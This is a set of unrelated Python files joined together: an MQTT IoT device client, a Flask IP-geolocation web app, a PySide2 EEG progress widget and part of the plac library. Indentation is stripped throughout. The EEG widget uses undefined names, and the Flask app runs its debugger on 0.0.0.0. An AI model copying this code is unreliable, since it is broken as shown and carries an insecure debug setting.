self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.on_subscribe = self.on_subscribe
self.client.on_disconnect = self.on_disconnect
self.updateInterval = 3
self.messagePending = False
def connect_to_broker(self):
"""
Connect to MQTT broker
"""
logging.info("Connecting to broker...")
self.client.username_pw_set(username=self.csid, password=hashlib.md5(self.csseckey.encode('utf-8')).hexdigest())
self.client.connect(self.mqtt_url, self.mqtt_port, 30)
logging.debug ('connect:')
self.client.loop_start()
#self.client.loop_forever()
#logging.debug('loop started')
time.sleep(1)
def on_message(self, client, userdata, msg):
"""
Callback for broker published events
"""
logging.debug('on_message')
#logging.debug(client)
#logging.debug(userdata)
#logging.debug(msg)
#logging.debug(msg.topic, msg.payload)
payload = json.loads(msg.payload.decode("utf-8"))
if msg.topic == self.topicReportAll or msg.topic == self.topicReport:
if payload['deviceId'] == self.targetId:
#self.eventQueue.put(payload['msgid'])
self.dataQueue.put(payload)
logging.debug (payload)
self.callback(payload)
else:
logging.debug ('\n report on differnt device : ' + msg.topic)
logging.debug (payload)
logging.debug('\n')
elif msg.topic == self.topicResp:
self.dataQueue.put(payload)
logging.debug (payload)
self.callback(payload)
elif msg.topic == self.topicReq:
logging.debug('publishing request' )
logging.debug (payload)
self.callback(payload)
else:
logging.debug(msg.topic, self.topicReport, self.topicReportAll )
#logging.debug("Event:{0} Device:{1} State:{2}".format(event, self.device_hash[deviceId].get_name(), state))
def on_connect(self, client, userdata, flags, rc):
"""
Callback for connection to broker
"""
logging.debug("Connected with result code %s" % rc)
#logging.debug( client, userdata, flags)
if (rc == 0):
logging.debug("Successfully connected to broker %s" % self.mqtt_url)
else:
logging.debug("Connection with result code %s" % rc);
sys.exit(2)
time.sleep(1)
logging.debug('Subsribe: ' + self.topicResp + ', '+self.topicReport+', '+ self.topicReportAll )
test1 = self.client.subscribe(self.topicResp)
#logging.debug(test1)
test2 = self.client.subscribe(self.topicReport)
#logging.debug(test2)
test3 = self.client.subscribe(self.topicReportAll)
#logging.debug(test3)
def on_disconnect(self, client, userdata,rc=0):
logging.debug('Disconnect - stop loop')
self.client.loop_stop()
def on_subscribe(self, client, userdata, mID, granted_QOS):
logging.debug('on_subscribe')
logging.debug('on_subscribe called')
logging.debug('client = ' + str(client))
logging.debug('userdata = ' + str(userdata))
logging.debug('mID = '+str(mID))
logging.debug('Granted QoS: ' + str(granted_QOS))
logging.debug('\n')
def on_publish(self, client, userdata, mID):
logging.debug('on_publish')
#logging.debug('client = ' + str(client))
#logging.debug('userdata = ' + str(userdata))
#logging.debug('mID = '+str(mID))
#logging.debug('\n')
def publish_data(self, data, callback):
logging.debug('publish_data: ' + data['method'])
dataTemp = str(json.dumps(data))
test = self.client.publish(self.topicReq, dataTemp)
if test.rc == 0:
time.sleep(2)
self.updateData(callback)
def shurt_down(self):
self.client.loop_stop()
def getData(self):
#expirationTime = int(time.time()*1000-60*60*1000) # 1 hour in milisec
if not(self.dataQueue.empty()):
temp = self.dataQueue.get()
dataOK = False
if 'event' in temp:
dataOK = True
if 'method' in temp:
dataOK = temp['code'] == '000000'
return(dataOK, temp)
else:
return(False, None)
'''
def eventMessagePending(self):
logging.debug('getEventData')
return(not self.eventQueue.empty())
def getEventMsgId(self):
logging.debug('getEventMsgId')
temp = (self.eventQueue.get())
return(temp)
'''
def monitorLoop(self, callback, updateInterval):
Monitor = threading.Thread(target = self.eventMonitorThread, args = (callback, updateInterval ))
Monitor.start()
def eventMonitorThread (self, callback, updateInterval):
time.sleep(5)
while not self.forceStop:
time.sleep(updateInterval)
while not self.dataQueue.empty():
self.updateData(callback)
logging.debug('eventMonitorThread GET DATA')
logging.debug('eventMonitorThread')
def updateData(self, callback):
self.mutex.acquire()
dataOK, rxdata = self.getData()
if dataOK:
callback(rxdata)
self.mutex.release()
def refreshDevice(self, methodStr, callback):
logging.debug(methodStr)
data = {}
data['time'] = str(int(time.time())*1000)
data['method'] = methodStr
data["targetDevice"] = self.get_id()
data["token"]= self.get_token()
self.publish_data(data, callback)
def setDevice(self, methodStr, data, callback):
data['time'] = str(int(time.time())*1000)
data['method'] = methodStr
data["targetDevice"] = self.get_id()
data["token"]= self.get_token()
self.publish_data( data, callback)
def getValue(self, data, key):
attempts = 1
while key not in data and attempts <3:
time.sleep(1)
attempts = attempts + 1
if key in data:
return(data[key])
else:
return('NA')
def daysToMask (self, dayList):
daysValue = 0
i = 0
for day in self.daysOfWeek:
if day in dayList:
daysValue = daysValue + pow(2,i)
i = i+1
return(daysValue)
def maskToDays(self, daysValue):
daysList = []
for i in range(0,6):
mask = pow(2,i)
if (daysValue & mask) != 0 :
daysList.append(self.daysOfWeek[i])
return(daysList)
def updateStatusData (self, data):
if 'online' in data[self.deviceData]:
self.dataAPI[self.deviceOnline] = data[self.deviceData][self.deviceOnline]
else:
self.dataAPI[self.deviceOnline] = True
if 'method' in data:
for key in data[self.deviceData][self.deviceInfo]:
self.dataAPI[self.deviceData][self.deviceInfo][key] = data[self.deviceData][self.deviceInfo][key]
else: #event
for key in data[self.deviceData]:
self.dataAPI[self.deviceData][self.deviceInfo][key] = data[self.deviceData][key]
self.dataAPI[self.lastUpdate] = data[self.messageTime]
self.dataAPI[self.lastMessage] = data
def eventPending(self):
if not self.eventQueue.empty():
return(self.eventQueue.get())
else:
return(None)
def getInfoAPI (self):
return(self.dataAPI)
def getState(self):
return(self.dataAPI[self.deviceData][self.deviceInfo]['state'])
def getInfoValue(self, key):
if key in self.dataAPI[self.deviceData][self.deviceInfo]:
return(self.dataAPI[self.deviceData][self.deviceInfo][key])
else:
return(None)
def sensorOnline(self):
return(self.dataAPI['online'] )
def getLastUpdate (self):
return(self.dataAPI[self.lastUpdate])
def updateGarageCtrlStatus(self, data):
self.dataAPI[self.deviceData][self.deviceInfo] = data['data']
self.dataAPI[self.lastUpdate] = data[self.messageTime]
self.dataAPI[self.lastMessage] = data
def getTempValueF(self):
return(self.getInfoValue('temperature')*9/5+32)
def getTempValueC(self):
return(self.getInfoValue('temperature'))
def getHumidityValue(self):
return(self.getInfoValue('humidity'))
def getAlarms(self):
return(self.getInfoValue('humidity'))
def timezoneOffsetSec(self):
local = tzlocal()
tnow = datetime.now()
tnow = tnow.replace(tzinfo = local)
utctnow = tnow.astimezone(tzutc())
tnowStr = str(tnow)
pos = tnowStr.rfind('+')
if pos > 0:
tnowStr = tnowStr[0:pos]
else:
pos = tnowStr.rfind('-')
tnowStr = tnowStr[0:pos]
utctnowStr = str(utctnow)
pos = utctnowStr.rfind('+')
if pos > 0:
utctnowStr = utctnowStr[0:pos]
else:
pos = utctnowStr.rfind('-')
utctnowStr = utctnowStr[0:pos]
tnow = datetime.strptime(tnowStr, '%Y-%m-%d %H:%M:%S.%f')
utctnow = datetime.strptime(utctnowStr, '%Y-%m-%d %H:%M:%S.%f')
diff = utctnow - tnow
return (diff.total_seconds())
|
main.py
|
import os
import geoip2.database
import re as ree
import time
import IP2Proxy
import custom_
from threading import Thread
from audio import WeebGen, WeebDel
from flask import Flask, request, render_template, jsonify
from config import home_dir, allowed_requests, clear_ban, error_emotes
db = IP2Proxy.IP2Proxy()
db.open(home_dir+"DB/IP2PROXY-LITE-PX.BIN")
reader = geoip2.database.Reader(home_dir+'DB/GeoLite2-City.mmdb')
app = Flask(__name__)
app.config['JSON_SORT_KEYS'] = False
dedasn = custom_.dedasn()
Data = {}
IP_bans = []
IP_Regex = r'^((\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])\.){3}(\d{1,2}|1\d{2}|2[0-4]\d|25[0-5])$'
def ip_audio(IP):
IPfile = str(IP).replace('.', '-')
if not os.path.exists(home_dir+'static/generated/'+IPfile+'.mp3'):
WeebGen(IP)
thread = Thread(target=WeebDel, args=(IP,))
thread.daemon = True
thread.start()
return '/static/generated/'+IPfile+'.mp3'
def clear_bans():
while True:
time.sleep(clear_ban)
IP_bans.clear()
@app.route("/", methods=['GET'])
@app.route("/home", methods=['GET'])
@app.route("/basic", methods=['GET'])
def home():
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Home',
'IP': IP_addr,
'audio': ip_audio(IP_addr),
}
return render_template('home.html', data=Data)
@app.route("/", methods=['POST'])
@app.route("/home", methods=['POST'])
@app.route("/basic", methods=['POST'])
def home_post():
IP = request.form['ip']
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Home',
'IP': IP,
}
if ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
Data['audio'] = ip_audio(IP)
IP_bans.append(IP_addr)
else:
Data['audio'] = 'static/crab/crabrave.mp3'
Data['error'] = 'Your IP Gone, You\'re on cooldown'
Data['emote'] = error_emotes['cooldown']
else:
Data['IP'] = ''
Data['audio'] = 'static/crab/baka.mp3'
Data['error'] = 'Invalid IP address'
Data['emote'] = error_emotes['invalid']
return render_template('home.html', data=Data)
@app.route("/advanced", methods=['GET'])
def advanced():
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
UA = request.headers.get('User-Agent')
Data = {
'title': 'Advanced',
'IP': IP_addr,
'user_agent': UA,
'audio': ip_audio(IP_addr),
'proxy_type': db.get_proxy_type(IP_addr),
'self_ip': IP_addr,
}
try:
response = reader.city(IP_addr)
re = dedasn.isp(IP_addr)
Data['country_name'] = response.country.name
Data['country_iso_code'] = response.country.iso_code
Data['subdiv'] = response.subdivisions.most_specific.name
Data['subdiv_iso_code'] = response.subdivisions.most_specific.iso_code
Data['city'] = response.city.name
Data['postal_code'] = response.postal.code
Data['latitude'] = response.location.latitude
Data['longitude'] = response.location.longitude
Data['ISP'] = re['isp']
Data['ASN'] = re['asn']
Data['proxy_type'] = db.get_proxy_type(IP_addr)
except Exception:
Data['error'] = 'IP address not in database'
Data['emote'] = error_emotes['database']
return render_template('advanced.html', data=Data)
@app.route("/advanced", methods=['POST'])
def advanced_post():
IP = request.form['ip']
UA = request.headers.get('User-Agent')
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Data = {
'title': 'Advanced',
'IP': IP,
'user_agent': UA,
'proxy_type': db.get_proxy_type(IP),
'self_ip': IP_addr,
}
if ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
try:
response = reader.city(IP)
re = dedasn.isp(IP)
Data['audio'] = ip_audio(IP)
Data['country_name'] = response.country.name
Data['country_iso_code'] = response.country.iso_code
Data['subdiv'] = response.subdivisions.most_specific.name
Data['subdiv_iso_code'] = response.subdivisions.most_specific.iso_code
Data['city'] = response.city.name
Data['postal_code'] = response.postal.code
Data['latitude'] = response.location.latitude
Data['longitude'] = response.location.longitude
Data['ISP'] = re['isp']
Data['ASN'] = re['asn']
IP_bans.append(IP_addr)
except Exception:
Data['audio'] = ip_audio(IP)
Data['error'] = 'IP address not in database'
Data['emote'] = error_emotes['database']
else:
Data['audio'] = 'static/crab/crabrave.mp3'
Data['error'] = 'Your IP Gone, You\'re on cooldown'
Data['emote'] = error_emotes['cooldown']
else:
Data['IP'] = ''
Data['audio'] = 'static/crab/baka.mp3'
Data['error'] = 'Invalid IP address'
Data['emote'] = error_emotes['invalid']
return render_template('advanced.html', data=Data)
@app.route("/api", methods=['GET', 'POST'])
def API():
Data = {'title': 'API'}
return render_template('api.html', data=Data)
@app.route("/about", methods=['GET', 'POST'])
def about():
Data = {'title': 'About'}
return render_template('about.html', data=Data)
@app.route("/api/v1", methods=['GET', 'POST'])
def api():
IP = str(request.args.get('ip'))
IP_addr = request.environ.get('HTTP_X_REAL_IP', request.remote_addr)
Type = str(request.args.get('data'))
error_ = {'status': 'error', 'message': 'error message'}
if IP == '127.0.0.1' or IP.lower() == 'localhost':
error_['message'] = 'localhost: your peepee is smoll'
return jsonify(error_)
elif ree.match(IP_Regex, IP):
if IP_bans.count(IP_addr) < allowed_requests:
Data = {}
try:
response = reader.city(IP)
resp = dedasn.isp(IP)
Data = {
'status': 'true',
'IP': IP,
'audio': ip_audio(IP),
'country_name': response.country.name,
'country_iso_code': response.country.iso_code,
'subdiv': response.subdivisions.most_specific.name,
'subdiv_iso_code': response.subdivisions.most_specific.iso_code,
'city': response.city.name,
'postal_code': response.postal.code,
'latitude': response.location.latitude,
'longitude': response.location.longitude,
'isp': resp['isp'],
'asn': resp['asn'],
'proxy_type': db.get_proxy_type(IP),
}
IP_bans.append(IP_addr)
if Type == 'all' or Type == 'None':
return jsonify(Data)
else:
new_Data = {}
Type = Type.split(',')
for i in Type:
new_Data[i] = Data[i]
return jsonify(new_Data)
except Exception:
error_['message'] = 'IP not in database or wrong data type'
return jsonify(error_)
else:
error_['message'] = 'You\'ve achieved your limit, fucc off sir'
return jsonify(error_)
else:
error_['message'] = 'Invalid IP Address'
return jsonify(error_)
if __name__ == "__main__":
thread1 = Thread(target=clear_bans)
thread1.daemon = True
thread1.start()
app.run(host='0.0.0.0', port=5000, debug=True)
|
ChangeWaveRangeWidget.py
|
from PySide2.QtWidgets import (QHBoxLayout, QProgressBar, QLabel, QWidget)
from Assets.mathematical_scripts.util import createWaveFilePatientXSLX, createWaveFilePatientMAT
import threading
#wavesToUpdate is an array contains the wave which have new range, other will not change.
class ChangeWaveRangeWidget(QWidget):
def __init__(self, wavesToUpdate):
QWidget.__init__(self)
self.setWindowTitle("Change range - EEG IHM")
self.waves = wavesToUpdate
WriteWavesRange() #Save the new range for next use
self.layout = self.CreateLayout()
self.setLayout(self.layout)
threading.Thread(target=self.createWavesAlphaBetaThetaDelta, daemon=True).start() #Launch the function in another thread to avoid GUI freezing
def CreateLayout(self):
layout = QHBoxLayout()
self.progressBar = QProgressBar(self)
layout.addWidget(self.progressBar)
self.progressLabel = QLabel("0")
layout.addWidget(self.progressLabel)
layout.addWidget(QLabel("%"))
return layout
#Create new wave file with new range
def createWavesAlphaBetaThetaDelta(self):
n = 0
for d in directories:
filesxslx = [file.split('\\')[-1] for file in glob.glob('./Datas/Raw/'+ d +'/' + '*.xlsx')] #take only files with xlsx extension
filesmat = [file.split('\\')[-1] for file in glob.glob('./Datas/Raw/'+ d +'/' + '*.mat')] #take only files with mat extension
for file in filesxslx:
for wave in self.waves:
n += 1
createWaveFilePatientXSLX(file, d, wave)
progress = round(n / (len(directories) * (len(files) + len(filesmat)) * len(self.waves)), 2) * 100
self.progressBar.setValue(progress)
self.progressLabel.setText(str(progress))
for file in filesmat:
for wave in self.waves:
n += 1
createWaveFilePatientMAT(file, d, wave)
progress = round(n / (len(directories) * (len(files) + len(filesmat)) * len(self.waves)), 2) * 100
self.progressBar.setValue(progress)
self.progressLabel.setText(str(progress))
self.close()
|
plac_ext.py
|
# this module requires Python 2.6+
from __future__ import with_statement
from contextlib import contextmanager
from operator import attrgetter
from gettext import gettext as _
import inspect
import os
import sys
import cmd
import shlex
import subprocess
import argparse
import itertools
import traceback
import multiprocessing
import signal
import threading
import plac_core
version = sys.version_info[:2]
if version < (3, 5):
from imp import load_source
else:
import importlib.util
def load_source(dotname, path):
spec = importlib.util.spec_from_file_location(dotname, path)
mod = importlib.util.module_from_spec(spec)
spec.loader.exec_module(mod)
return mod
if sys.version < '3':
def exec_(_code_, _globs_=None, _locs_=None):
if _globs_ is None:
frame = sys._getframe(1)
_globs_ = frame.f_globals
if _locs_ is None:
_locs_ = frame.f_locals
del frame
elif _locs_ is None:
_locs_ = _globs_
exec("""exec _code_ in _globs_, _locs_""")
exec('''
def raise_(tp, value=None, tb=None):
raise tp, value, tb
''')
else:
exec_ = eval('exec')
def raise_(tp, value=None, tb=None):
"""
A function that matches the Python 2.x ``raise`` statement. This
allows re-raising exceptions with the cls value and traceback on
Python 2 and 3.
"""
if value is not None and isinstance(tp, Exception):
raise TypeError("instance exception may not have a separate value")
if value is not None:
exc = tp(value)
else:
exc = tp
if exc.__traceback__ is not tb:
raise exc.with_traceback(tb)
raise exc
try:
raw_input
except NameError: # python 3
raw_input = input
def decode(val):
"""
Decode an object assuming the encoding is UTF-8.
"""
try:
# assume it is an encoded bytes object
return val.decode('utf-8')
except AttributeError:
# it was an already decoded unicode object
return str(val)
# ############################ generic utils ############################### #
@contextmanager
def stdout(fileobj):
"usage: with stdout(file('out.txt', 'a')): do_something()"
orig_stdout = sys.stdout
sys.stdout = fileobj
try:
yield
finally:
sys.stdout = orig_stdout
def write(x):
"Write str(x) on stdout and flush, no newline added"
sys.stdout.write(str(x))
sys.stdout.flush()
def gen_val(value):
"Return a generator object with a single element"
yield value
def gen_exc(etype, exc, tb):
"Return a generator object raising an exception"
raise_(etype, exc, tb)
yield
def less(text):
"Send a text to less via a pipe"
# -c clear the screen before starting less
po = subprocess.Popen(['less', '-c'], stdin=subprocess.PIPE)
try:
po.stdin.write(text)
except IOError:
pass
po.stdin.close()
po.wait()
use_less = (sys.platform != 'win32') # unices
class TerminatedProcess(Exception):
pass
def terminatedProcess(signum, frame):
raise TerminatedProcess
# ########################## readline support ############################ #
def read_line(stdin, prompt=''):
"Read a line from stdin, using readline when possible"
if isinstance(stdin, ReadlineInput):
return stdin.readline(prompt)
else:
write(prompt)
return stdin.readline()
def read_long_line(stdin, terminator):
"""
Read multiple lines from stdin until the terminator character is found,
then yield a single space-separated long line.
"""
while True:
lines = []
while True:
line = stdin.readline() # ends with \n
if not line: # EOF
return
line = line.strip()
if not line:
continue
elif line[-1] == terminator:
lines.append(line[:-1])
break
else:
lines.append(line)
yield ' '.join(lines)
class ReadlineInput(object):
"""
An iterable with a .readline method reading from stdin.
"""
def __init__(self, completions, case_sensitive=True, histfile=None):
self.completions = completions
self.case_sensitive = case_sensitive
self.histfile = histfile
if not case_sensitive:
self.completions = [c.upper() for c in completions]
import readline
self.rl = readline
readline.parse_and_bind("tab: complete")
readline.set_completer(self.complete)
def __enter__(self):
self.old_completer = self.rl.get_completer()
try:
if self.histfile:
self.rl.read_history_file(self.histfile)
except IOError: # the first time
pass
return self
def __exit__(self, etype, exc, tb):
self.rl.set_completer(self.old_completer)
if self.histfile:
self.rl.write_history_file(self.histfile)
def complete(self, kw, state):
# state is 0, 1, 2, ... and increases by hitting TAB
if not self.case_sensitive:
kw = kw.upper()
try:
return [k for k in self.completions if k.startswith(kw)][state]
except IndexError: # no completions
return # exit
def readline(self, prompt=''):
try:
return raw_input(prompt) + '\n'
except EOFError:
return ''
def __iter__(self):
return iter(self.readline, '')
# ################# help functionality in plac interpreters ################# #
class HelpSummary(object):
"Build the help summary consistently with the cmd module"
@classmethod
def add(cls, obj, specialcommands):
p = plac_core.parser_from(obj)
c = cmd.Cmd(stdout=cls())
c.stdout.write('\n')
c.print_topics('special commands',
sorted(specialcommands), 15, 80)
c.print_topics('custom commands',
sorted(obj.commands), 15, 80)
c.print_topics('commands run in external processes',
sorted(obj.mpcommands), 15, 80)
c.print_topics('threaded commands',
sorted(obj.thcommands), 15, 80)
p.helpsummary = str(c.stdout)
def __init__(self):
self._ls = []
def write(self, s):
self._ls.append(s)
def __str__(self):
return ''.join(self._ls)
class PlacFormatter(argparse.RawDescriptionHelpFormatter):
def _metavar_formatter(self, action, default_metavar):
'Remove special commands from the usage message'
choices = action.choices or {}
action.choices = dict((n, c) for n, c in choices.items()
if not n.startswith('.'))
return super(PlacFormatter, self)._metavar_formatter(
action, default_metavar)
def format_help(self):
"Attached to plac_core.ArgumentParser for plac interpreters"
try:
return self.helpsummary
except AttributeError:
return super(plac_core.ArgumentParser, self).format_help()
plac_core.ArgumentParser.format_help = format_help
def default_help(obj, cmd=None):
"The default help functionality in plac interpreters"
parser = plac_core.parser_from(obj)
if cmd is None:
yield parser.format_help()
return
subp = parser.subparsers._name_parser_map.get(cmd)
if subp is None:
yield _('Unknown command %s' % cmd)
elif getattr(obj, '_interact_', False): # in interactive mode
formatter = subp._get_formatter()
formatter._prog = cmd # remove the program name from the usage
formatter.add_usage(
subp.usage, [a for a in subp._actions if a.dest != 'help'],
subp._mutually_exclusive_groups)
formatter.add_text(subp.description)
for action_group in subp._action_groups:
formatter.start_section(action_group.title)
formatter.add_text(action_group.description)
formatter.add_arguments(a for a in action_group._group_actions
if a.dest != 'help')
formatter.end_section()
yield formatter.format_help()
else: # regular argparse help
yield subp.format_help()
# ######################## import management ############################## #
try:
PLACDIRS = os.environ.get('PLACPATH', '.').split(':')
except:
raise ValueError(_('Ill-formed PLACPATH: got %PLACPATHs') % os.environ)
def partial_call(factory, arglist):
"Call a container factory with the arglist and return a plac object"
a = plac_core.parser_from(factory).argspec
if a.defaults or a.varargs or a.varkw:
raise TypeError('Interpreter.call must be invoked on '
'factories with required arguments only')
required_args = ', '.join(a.args)
if required_args:
required_args += ',' # trailing comma
code = '''def makeobj(interact, %s *args):
obj = factory(%s)
obj._interact_ = interact
obj._args_ = args
return obj\n''' % (required_args, required_args)
dic = dict(factory=factory)
exec_(code, dic)
makeobj = dic['makeobj']
makeobj.add_help = False
if inspect.isclass(factory):
makeobj.__annotations__ = getattr(
factory.__init__, '__annotations__', {})
else:
makeobj.__annotations__ = getattr(
factory, '__annotations__', {})
makeobj.__annotations__['interact'] = (
'start interactive interpreter', 'flag', 'i')
return plac_core.call(makeobj, arglist)
def import_main(path, *args):
"""
An utility to import the main function of a plac tool. It also
works with command container factories.
"""
if ':' in path: # importing a factory
path, factory_name = path.split(':')
else: # importing the main function
factory_name = None
if not os.path.isabs(path): # relative path, look at PLACDIRS
for placdir in PLACDIRS:
fullpath = os.path.join(placdir, path)
if os.path.exists(fullpath):
break
else: # no break
raise ImportError(_('Cannot find %s' % path))
else:
fullpath = path
name, ext = os.path.splitext(os.path.basename(fullpath))
module = load_source(name, fullpath)
if factory_name:
tool = partial_call(getattr(module, factory_name), args)
else:
tool = module.main
return tool
# ############################ Task classes ############################# #
# base class not instantiated directly
class BaseTask(object):
"""
A task is a wrapper over a generator object with signature
Task(no, arglist, genobj), attributes
.no
.arglist
.outlist
.str
.etype
.exc
.tb
.status
and methods .run and .kill.
"""
STATES = ('SUBMITTED', 'RUNNING', 'TOBEKILLED', 'KILLED', 'FINISHED',
'ABORTED')
def __init__(self, no, arglist, genobj):
self.no = no
self.arglist = arglist
self._genobj = self._wrap(genobj)
self.str, self.etype, self.exc, self.tb = '', None, None, None
self.status = 'SUBMITTED'
self.outlist = []
def notify(self, msg):
"Notifies the underlying monitor. To be implemented"
def _wrap(self, genobj, stringify_tb=False):
"""
Wrap the genobj into a generator managing the exceptions,
populating the .outlist, setting the .status and yielding None.
stringify_tb must be True if the traceback must be sent to a process.
"""
self.status = 'RUNNING'
try:
for value in genobj:
if self.status == 'TOBEKILLED': # exit from the loop
raise GeneratorExit
if value is not None: # add output
self.outlist.append(value)
self.notify(decode(value))
yield
except Interpreter.Exit: # wanted exit
self._regular_exit()
raise
except (GeneratorExit, TerminatedProcess, KeyboardInterrupt):
# soft termination
self.status = 'KILLED'
except Exception: # unexpected exception
self.etype, self.exc, tb = sys.exc_info()
self.tb = ''.join(traceback.format_tb(tb)) if stringify_tb else tb
self.status = 'ABORTED'
else:
self._regular_exit()
def _regular_exit(self):
self.status = 'FINISHED'
try:
self.str = '\n'.join(map(decode, self.outlist))
except IndexError:
self.str = 'no result'
def run(self):
"Run the inner generator"
for none in self._genobj:
pass
def kill(self):
"Set a TOBEKILLED status"
self.status = 'TOBEKILLED'
def wait(self):
"Wait for the task to finish: to be overridden"
@property
def traceback(self):
"Return the traceback as a (possibly empty) string"
if self.tb is None:
return ''
elif isinstance(self.tb, (str, bytes)):
return self.tb
else:
return ''.join(traceback.format_tb(self.tb))
@property
def result(self):
self.wait()
if self.exc:
if isinstance(self.tb, (str, bytes)):
raise self.etype(self.tb)
else:
raise_(self.etype, self.exc, self.tb or None)
if not self.outlist:
return None
return self.outlist[-1]
def __repr__(self):
"String representation containing class name, number, arglist, status"
return '<%s %d [%s] %s>' % (
self.__class__.__name__, self.no,
' '.join(self.arglist), self.status)
nulltask = BaseTask(0, [], ('skip' for dummy in (1,)))
# ######################## synchronous tasks ############################## #
class SynTask(BaseTask):
"""
Synchronous task running in the interpreter loop and displaying its
output as soon as available.
"""
def __str__(self):
"Return the output string or the error message"
if self.etype: # there was an error
return '%s: %s' % (self.etype.__name__, self.exc)
else:
return '\n'.join(map(str, self.outlist))
class ThreadedTask(BaseTask):
"""
A task running in a separated thread.
"""
def __init__(self, no, arglist, genobj):
BaseTask.__init__(self, no, arglist, genobj)
self.thread = threading.Thread(target=super(ThreadedTask, self).run)
def run(self):
"Run the task into a thread"
self.thread.start()
def wait(self):
"Block until the thread ends"
self.thread.join()
# ######################## multiprocessing tasks ######################### #
def sharedattr(name, on_error):
"Return a property to be attached to an MPTask"
def get(self):
try:
return getattr(self.ns, name)
except: # the process was killed or died hard
return on_error
def set(self, value):
try:
setattr(self.ns, name, value)
except: # the process was killed or died hard
pass
return property(get, set)
class MPTask(BaseTask):
"""
A task running as an external process. The current implementation
only works on Unix-like systems, where multiprocessing use forks.
"""
str = sharedattr('str', '')
etype = sharedattr('etype', None)
exc = sharedattr('exc', None)
tb = sharedattr('tb', None)
status = sharedattr('status', 'ABORTED')
@property
def outlist(self):
try:
return self._outlist
except: # the process died hard
return []
def notify(self, msg):
self.man.notify_listener(self.no, msg)
def __init__(self, no, arglist, genobj, manager):
"""
The monitor has a .send method and a .man multiprocessing.Manager
"""
self.no = no
self.arglist = arglist
self._genobj = self._wrap(genobj, stringify_tb=True)
self.man = manager
self._outlist = manager.mp.list()
self.ns = manager.mp.Namespace()
self.status = 'SUBMITTED'
self.etype, self.exc, self.tb = None, None, None
self.str = repr(self)
self.proc = multiprocessing.Process(target=super(MPTask, self).run)
def run(self):
"Run the task into an external process"
self.proc.start()
def wait(self):
"Block until the external process ends or is killed"
self.proc.join()
def kill(self):
"""Kill the process with a SIGTERM inducing a TerminatedProcess
exception in the children"""
self.proc.terminate()
# ######################## Task Manager ###################### #
class TaskManager(object):
"""
Store the given commands into a task registry. Provides methods to
manage the submitted tasks.
"""
cmdprefix = '.'
specialcommands = set(['.last_tb'])
def __init__(self, obj):
self.obj = obj
self.registry = {} # {taskno : task}
if obj.mpcommands or obj.thcommands:
self.specialcommands.update(['.kill', '.list', '.output'])
interact = getattr(obj, '_interact_', False)
self.parser = plac_core.parser_from(
obj, prog='' if interact else None, formatter_class=PlacFormatter)
HelpSummary.add(obj, self.specialcommands)
self.man = Manager() if obj.mpcommands else None
signal.signal(signal.SIGTERM, terminatedProcess)
def close(self):
"Kill all the running tasks"
for task in self.registry.values():
try:
if task.status == 'RUNNING':
task.kill()
task.wait()
except: # task killed, nothing to wait
pass
if self.man:
self.man.stop()
def _get_latest(self, taskno=-1, status=None):
"Get the latest submitted task from the registry"
assert taskno < 0, 'You must pass a negative number'
if status:
tasks = [t for t in self.registry.values()
if t.status == status]
else:
tasks = [t for t in self.registry.values()]
tasks.sort(key=attrgetter('no'))
if len(tasks) >= abs(taskno):
return tasks[taskno]
# ########################## special commands ######################## #
@plac_core.annotations(
taskno=('task to kill', 'positional', None, int))
def kill(self, taskno=-1):
'kill the given task (-1 to kill the latest running task)'
if taskno < 0:
task = self._get_latest(taskno, status='RUNNING')
if task is None:
yield 'Nothing to kill'
return
elif taskno not in self.registry:
yield 'Unknown task %d' % taskno
return
else:
task = self.registry[taskno]
if task.status in ('ABORTED', 'KILLED', 'FINISHED'):
yield 'Already finished %s' % task
return
task.kill()
yield task
@plac_core.annotations(
status=('', 'positional', None, str, BaseTask.STATES))
def list(self, status='RUNNING'):
'list tasks with a given status'
for task in self.registry.values():
if task.status == status:
yield task
@plac_core.annotations(
taskno=('task number', 'positional', None, int))
def output(self, taskno=-1, fname=None):
'show the output of a given task (and optionally save it to a file)'
if taskno < 0:
task = self._get_latest(taskno)
if task is None:
yield 'Nothing to show'
return
elif taskno not in self.registry:
yield 'Unknown task %d' % taskno
return
else:
task = self.registry[taskno]
outstr = '\n'.join(map(str, task.outlist))
if fname:
open(fname, 'w').write(outstr)
yield 'saved output of %d into %s' % (taskno, fname)
return
yield task
if len(task.outlist) > 20 and use_less:
less(outstr) # has no meaning for a plac server
else:
yield outstr
@plac_core.annotations(
taskno=('task number', 'positional', None, int))
def last_tb(self, taskno=-1):
"show the traceback of a given task, if any"
task = self._get_latest(taskno)
if task:
yield task.traceback
else:
yield 'Nothing to show'
# ########################## SyncProcess ############################# #
class Process(subprocess.Popen):
"Start the interpreter specified by the params in a subprocess"
def __init__(self, params):
signal.signal(signal.SIGPIPE, signal.SIG_DFL)
# to avoid broken pipe messages
code = '''import plac, sys
sys.argv[0] = '<%s>'
plac.Interpreter(plac.import_main(*%s)).interact(prompt='i>\\n')
''' % (params[0], params)
subprocess.Popen.__init__(
self, [sys.executable, '-u', '-c', code],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
self.man = multiprocessing.Manager()
def close(self):
"Close stdin and stdout"
self.stdin.close()
self.stdout.close()
self.man.shutdown()
def recv(self): # char-by-char cannot work
"Return the output of the subprocess, line-by-line until the prompt"
lines = []
while True:
lines.append(self.stdout.readline())
if lines[-1] == 'i>\n':
out = ''.join(lines)
return out[:-1] + ' ' # remove last newline
def send(self, line):
"""Send a line (adding a newline) to the underlying subprocess
and wait for the answer"""
self.stdin.write(line + os.linesep)
return self.recv()
class StartStopObject(object):
started = False
def start(self):
pass
def stop(self):
pass
class Monitor(StartStopObject):
"""
Base monitor class with methods add_listener/del_listener/notify_listener
read_queue and and start/stop.
"""
def __init__(self, name, queue=None):
self.name = name
self.queue = queue or multiprocessing.Queue()
def add_listener(self, taskno):
pass
def del_listener(self, taskno):
pass
def notify_listener(self, taskno, msg):
pass
def start(self):
pass
def stop(self):
pass
def read_queue(self):
pass
class Manager(StartStopObject):
"""
The plac Manager contains a multiprocessing.Manager and a set
of slave monitor processes to which we can send commands. There
